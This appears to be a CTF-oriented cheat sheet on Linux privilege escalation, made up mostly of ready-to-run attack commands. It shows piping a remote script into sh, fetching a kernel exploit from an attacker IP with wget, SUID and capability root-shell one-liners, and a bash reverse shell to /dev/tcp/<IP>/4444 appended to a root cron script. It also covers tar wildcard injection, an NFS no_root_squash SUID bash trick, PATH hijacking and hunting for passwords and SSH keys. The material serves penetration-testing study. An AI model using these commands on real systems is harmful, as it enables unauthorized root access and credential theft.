Skip to content
CTF

Linux Privilege Escalation

Advanced techniques for Linux privilege escalation: SUID, Kernel, Capabilities, and NFS

Linux Privilege Escalation

1. Automated Enumeration

Don't waste time manually checking everything first. Run these, but read the output manually.

  • LinPEAS: The gold standard.
    BASH 
    curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
  • LinEnum: Older but reliable.
    BASH 
    ./LinEnum.sh -t
  • Linux Exploit Suggester: For kernel exploits.
    BASH 
    ./linux-exploit-suggester.sh

2. Kernel Exploits (The "Hail Mary")

Use only if misconfigurations fail. It can crash the box.

  1. Check Version: uname -a, cat /etc/issue, cat /proc/version.
  2. Search: searchsploit linux kernel <version>.
  3. Compile & Run:
    BASH 
    # On attacker machine
gcc -m32 -o exploit exploit.c # If target is 32-bit
gcc -o exploit exploit.c      # If target is 64-bit

# Transfer to target (curl, wget, netcat)
wget http://<IP>:8000/exploit
chmod +x exploit
./exploit
    • Common Exploits: DirtyCow (CVE-2016-5195), PwnKit (CVE-2021-4034), DirtyPipe (CVE-2022-0847).

3. SUID/SGID Binaries

Executables run with the permissions of the file owner (often root).

  • Find SUID:
    BASH 
    find / -perm -u=s -type f 2>/dev/null
  • GTFOBins: If you see a standard binary (gym, cp, find, vim) in the list, check GTFOBins.
    • Example (Find):
      BASH 
      find . -exec /bin/sh -p \; -quit
    • Example (Systemctl): Created a service file to exec a reverse shell, then systemctl link.
    • Custom Binaries: Run strings <binary> or ltrace <binary> to see if it calls other system binaries without absolute paths (Path Hijacking).

4. Capabilities

Granular permissions that act like SUID but are harder to spot.

  • Find Capabilities:
    BASH 
    getcap -r / 2>/dev/null
  • Dangerous Caps:
    • cap_setuid+ep: Process can change UID (become root).
      BASH 
      # If python has this cap:
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
    • cap_dac_read_search+ep: Bypass file read checks (Read shadow file).

5. Cron Jobs

Scheduled tasks running as root.

  • Check: cat /etc/crontab, ls -la /etc/cron.d, systemctl list-timers.
  • Vectors:
    1. Writable Script: If a script running as root is writable by you, overwrite it with a reverse shell.
      BASH 
      echo "bash -i >& /dev/tcp/<IP>/4444 0>&1" >> /path/to/script.sh
    2. Wildcard Injection: If the command uses * (e.g., tar *), you can create files named like flags (e.g., --checkpoint=1) to execute commands.
      BASH 
      touch /path/to/backup/--checkpoint=1
touch /path/to/backup/--checkpoint-action=exec=sh\ shell.sh

6. NFS Root Squashing

If /etc/exports has no_root_squash, you can mount the share and create a SUID binary as root.

  1. Check Enumerate: cat /etc/exports on target or showmount -e <target> from attacker.
  2. Mount:
    BASH 
    mkdir /tmp/nfs
mount -t nfs <IP>:/share /tmp/nfs
  3. Exploit:
    BASH 
    # On attacker (as root)
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash

# On target
/share/bash -p
# You are now root.

7. Path Hijacking

If a root script calls a binary without the full path (e.g., gzip instead of /bin/gzip).

  1. Identify: strings script -> calls gzip.
  2. Exploit:
    BASH 
    cd /tmp
echo "/bin/bash" > gzip
chmod +x gzip
export PATH=/tmp:$PATH
./vulnerable_script

8. Passwords & Keys

  • History Files: cat ~/.bash_history
  • Config Files: grep -r "password" /var/www/html
  • SSH Keys: Check ~/.ssh/id_rsa, /root/.ssh/authorized_keys (if readable).
Back to Cheatsheets
On this page